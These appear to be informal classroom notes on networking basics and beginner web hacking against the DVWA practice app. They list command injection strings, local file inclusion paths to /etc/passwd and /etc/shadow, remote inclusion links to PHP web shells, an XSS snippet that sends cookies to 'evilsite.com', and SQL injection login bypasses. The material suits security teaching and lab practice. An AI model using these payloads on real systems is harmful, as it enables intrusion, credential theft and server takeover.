== Networking ==
IPv4/IPv6
 ipv4 127.0.0.1
 ipv6 2001:db8:3c4d:15::1a2f:1a2b.
DNS
  translates domain names into ip addressess

client server
        CLIENT = YOU(r device)
        web server in this case
        client: "hey google give me x page" -> upload
        google: "here I found it, go ahead and download this page" <- download
        request -> reply

TCP/UDP

web pages
        files. .html .php .aspx
        request: /dogs.html -> server: here is dogs.html
request/reply/"everything is a file"
frontend/backend

get/post/etc
        "hey google, search for ppony fanfics"
        request: POST search=pony fanfics

frontend: is the stuff sent to your Browser
        and the web pages you make requests to
        (public, client-facing)
        html/css/javascript
backend: web servers,
        php, node,
        database, actions, api
    
== Basic Web Hacking ==
DVWA
Web Browser:
* command injection
        get the GET var (ip)
        load that into a command (ping command)
        execute
        theory: execute("ping $ip");
        $ip = 8.8.8.8
                Theory execute("ping 8.8.8.8")
        $ip = 8.8.8.8; ls
        $ip = 8.8.8.8 && ls -lah && whoami && groups && id
        $ip = 8.8.8.8 && echo "hello world" > file.txt

        a few things to try:
                ; (stack commands)
                && (stacks commands)
                ` (executes commands on some systems)
                echo "something" > file.php (make a file)

* LFI
        Local File Inclusion
        "web server loads a file from its own drive and shows it"
        try making it read a sensitive file?
        a few things to try:
                /etc/shadow
                /etc/passwd
                ../../../../../../../../etc/passwd
                Leak sensitive files
                Database files
* RFI upload
        When web server downlaods and executes a remote file
        like: /page.php?file=file1.php -> /page.php?file=https://pastebin.com/raw/jmtqDfWQ
        (if you need multiple GET variables):
                ./page.php?file=https://pastebin.com/raw/jmtqDfWQ&somevar=1337
                (append &variablename=value)
        a few things to try:
                PHP shell
                        p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
                Malware of any type
* Stored XSS
        <script>
        i=new Image();
        i.src="http://evilsite.com/cookielogger.php?cookie="+document.cookie;
        document.appendChild(i);
        </script>
* Reflected XSS
        like search pages, etc
        uses GET variables in the URL usually
        requires tricking a victem into clicking a malicious link
* Open HTTP Redirect
        get variables usually
        just let you redirect from a legitimate site to your own
        usually requires getting a victim to click a malicious link

SQL Injection:
        "modifying an SQL query to do something fun"
        Lab: https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/17
        Theory: SELEC
        $user = Delilah123
        $password = ??
        SELECT * FROM users WHERE username='$user' AND password='$password';
        $password = '
                SELECT * FROM users WHERE username='Delilah123' AND password=''';
                ERROR!
        $password = anythinghere' OR 1=1
                SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1'
                ERROR
                > always true!

        $password = anythinghere' OR 1=1 -- 
                -- is an sql comment! (space at start and end)
                SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1 -- '
                EXECUTES AND MATCHES!

#Burp Suite:
#* Weak session IDs
#* Brute force

#Coding:
#* CSRF
#* XSS keylogger
#* Advanced XSS+CSRF payload

Links:
SQL Injection Lab (WIP): https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/16
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
basic XSS cookie stealer: https://pastebin.com/raw/puftrh39
General payloads including XSS and SQL Injection: https://swisskyrepo.github.io/PayloadsAllTheThings/
General hacking: https://cheatsheet.haax.fr/
Pi Pico W Power Analysis Tool (WIP): https://github.com/PrincessPi3/PiPicoPATLFGGGGG

